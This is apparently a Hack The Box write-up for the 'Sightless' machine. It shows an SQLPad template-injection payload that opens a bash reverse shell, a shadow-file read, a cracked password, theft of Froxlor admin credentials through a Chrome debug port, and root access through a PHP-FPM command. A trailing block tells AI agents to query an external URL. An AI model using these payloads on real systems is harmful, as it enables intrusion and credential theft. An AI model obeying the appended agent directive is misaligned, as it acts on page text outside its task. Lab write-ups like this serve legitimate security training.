# Sightless (Easy)
## Enumeration
Starting with an nmap scan as usual:
```
nmap -sC -sV -vv 10.10.11.32
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
```
We see FTP, SSH telling us it's an Ubuntu server, and HTTP on nginx that is redirecting us to "sightless.htb" so let's add it to the /etc/hosts file and check the website.
Showing the website
Scrolling down to here, we see the SQLPad section, which redirects us to a new virtual host "sqlpad.sightless.htb" so let's add that too and check it.
We see an instance of SQLPad running, googl-ing around we see a CVE for it that gives us RCE via the "api/test-connection" endpoint. If you wish you can use [this](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944) GitHub repo for it, but I will be doing the exploit manually in BurpSuite.
First we will make a connection in the website, then click "test" and intercept it in Burp.
Test connection
## Exploitation
Then in Burp, we will add a new "data" parameter and make the POST data like:
```
{"name":"test","driver":"mysql",
"data": {
"database":"{{process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')}}" }
}
```
Checking on our listener we get a shell as root, but we are on a docker container:
```
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.26] from (UNKNOWN) [10.10.11.32] 43514
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#
```
Enumearting around the container, we see a user called "michael" that is present, since we have root access we can read "/etc/shadow", get his password and try to crack it.
```bash
cat /etc/shadow
cat /etc/shadow
root:$6$......
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa
```
Getting his password and loading it into John, we can crack it easily and login via SSH.
```bash
john --show michael.hash
?:insanec
1 password hash cracked, 0 left
```
Accessing the server via SSH, we got user.txt
```bash
michael@sightless:~$ wc -c user.txt
33 user.txt
```
## ROOT
Enumearting in the machine we found port 8080 listening locally.
```bash
michael@sightless:~$ ss -natpl
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:40535 0.0.0.0:*
```
Forwarding it to our box using SSH so we can access it like so:
```bash
ssh -L 8080:127.0.0.1:8080 michael@sightless.htb
```
And now going to localhost:8080 on our box, we see a froxlor instance:
Website on 8080
Trying the old credentials we have but none worked, upon further enumeration on the box, we see a chrome debug port being used, by monitoring the processes, and checking the internal ports again, we try the ports in the 40000 range, we can access the debug port.
First let's forward the port alongside 8080.
```bash
ssh -L 8080:127.0.0.1:8080 -L 41557:127.0.0.1:41557 michael@sightless.htb
```
Then opening a chromium based browser we can go to "chrome://inspect" then click configure, and add the host and the port we have:
Debug port
Clicking "Done" then we can see:
Showing result
Inspecting it, we can see requests being made to the Froxlor website, checking the network tabs, we can see it's logging in and we can get the admin password.
Admin credentials
And we get access to the admin dashboard.
Going to PHP-FPM configuration tab, we can edit the restart command (""), so we made a bash 1 liner reverse shell, then making the restart command: "bash /tmp/vamp.sh". After that we can go restart the PHP-FPM setting from the system configuration tab, and we will get a reverse shell on our listener:
```bash
root@sightless:~# ls
ls
docker-volumes
root.txt
scripts
root@sightless:~# wc -c root.txt
wc -c root.txt
33 root.txt
```
Happy hacking :) :vampire:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://acaard-castle.gitbook.io/acaard/writeups/htb-boxes/sightless-easy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.